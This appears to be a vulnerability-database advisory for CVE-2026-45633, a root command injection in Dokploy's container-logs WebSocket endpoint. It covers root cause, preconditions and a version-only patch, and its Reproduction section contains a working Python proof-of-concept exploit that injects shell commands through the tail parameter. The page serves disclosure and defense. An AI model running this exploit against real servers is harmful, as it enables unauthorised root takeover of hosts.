Critical severity9.9NVD Advisory· Published May 29, 2026· Updated May 29, 2026

CVE-2026-45633

Description

Dokploy is a free, self-hostable Platform as a Service (PaaS). In 0.26.6 and earlier, Dokploy contains a command injection vulnerability in the /docker-container-logs WebSocket endpoint. The tail and since parameters are not validated and are directly concatenated into shell commands, allowing authenticated users to execute arbitrary commands with root privileges.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Dokploy v0.26.6 and earlier have a command injection in the /docker-container-logs WebSocket endpoint allowing authenticated root-level RCE.

Vulnerability

Dokploy versions 0.26.6 and earlier contain a command injection vulnerability in the /docker-container-logs WebSocket endpoint. The tail and since URL parameters are not validated and are directly concatenated into a shell command executed via spawn(shell, ["-c", command]), allowing an authenticated attacker to inject arbitrary shell commands. [1]

Exploitation

An attacker with network access to the Dokploy instance and valid authentication can send a crafted WebSocket request to /docker-container-logs with a malicious tail or since parameter containing shell metacharacters (e.g., 10; whoami; #). The server then executes the injected command without further user interaction. [1]

Impact

Successful exploitation grants arbitrary command execution with root privileges, leading to full compromise of the Dokploy application and potentially the host system, including data exfiltration, backdoor installation, and lateral movement. [1]

Mitigation

As of the publication date, no patched version has been released. Users should restrict access to the WebSocket endpoint to trusted authenticated users and consider implementing input validation manually. Monitor the Dokploy project for security updates. [1]

References

Command Injection in /docker-container-logs Endpoint

AI Insight generated on May 29, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

Dokploy/Dokployinferred2 versions
<=0.26.6+ 1 more
- (no CPE)range: <=0.26.6
- (no CPE)range: <=0.26.6

Patches

fa201a5a963e

Update package.json

https://github.com/Dokploy/dokployMauricio SiuJan 31, 2026Fixed in 0.26.7via release-tag

commit

1 file changed · +1 −1

apps/dokploy/package.json+1 −1 modified

@@ -1,6 +1,6 @@
 {
 	"name": "dokploy",
-	"version": "v0.26.6",
+	"version": "v0.26.7",
 	"private": true,
 	"license": "Apache-2.0",
 	"type": "module",

Vulnerability mechanics

Root cause

"Missing input validation on the `tail` and `since` WebSocket parameters allows direct shell command injection."

Attack vector

An authenticated attacker sends a WebSocket request to `/docker-container-logs` with a malicious `tail` or `since` parameter containing shell metacharacters (e.g., `10; whoami; #`). The server concatenates this payload directly into a `docker container logs` command, which the shell interprets as multiple commands. The injected command executes with root privileges because the Dokploy service runs as root. [CWE-78, ref_id=1]

Affected code

The vulnerability resides in `apps/dokploy/server/wss/docker-container-logs.ts`. The `tail` and `since` parameters from the WebSocket URL are not validated (lines 32-36) and are directly concatenated into a shell command (lines 114-122), which is then executed via `spawn(shell, ["-c", command], ...)` (line 123). [ref_id=1]

What the fix does

The patch in commit `fa201a5a963e6594c747ba867d61637929c2f925` only bumps the version from v0.26.6 to v0.26.7 in `package.json` and does not include any code changes to fix the vulnerability. The advisory [ref_id=1] recommends adding input validation functions (`isValidTail`, `isValidSince`) and switching from shell string concatenation to using `spawn("docker", args, ...)` with a parameter array, which prevents shell injection entirely.

Preconditions

authAttacker must have a valid authenticated session cookie for Dokploy
networkAttacker must be able to reach the WebSocket endpoint over the network
inputThe `tail` or `since` query parameter must be attacker-controlled and contain shell metacharacters

Reproduction

```python #!/usr/bin/env python3 import asyncio from urllib.parse import quote import websockets

async def exploit(target, cookie, cmd): payload = f"10; {cmd}; #" uri = f"{target.replace('http','ws')}/docker-container-logs?containerId=dummy&tail={quote(payload)}" async with websockets.connect(uri, additional_headers={"Cookie": cookie}) as ws: output = "" while True: try: output += await asyncio.wait_for(ws.recv(), timeout=2) except asyncio.TimeoutError: break return output

# Usage: python3 poc.py http://target:3001 "better-auth.session_token=xxx" whoami ``` [ref_id=1]

Generated on May 29, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

github.com/Dokploy/dokploy/security/advisories/GHSA-wmqj-wr9q-327pnvd

News mentions

No linked articles in our index yet.

cvss	0.643
epss	0.000
exploit	0.000
kev	0.000
patch	-0.070
ransomware	0.000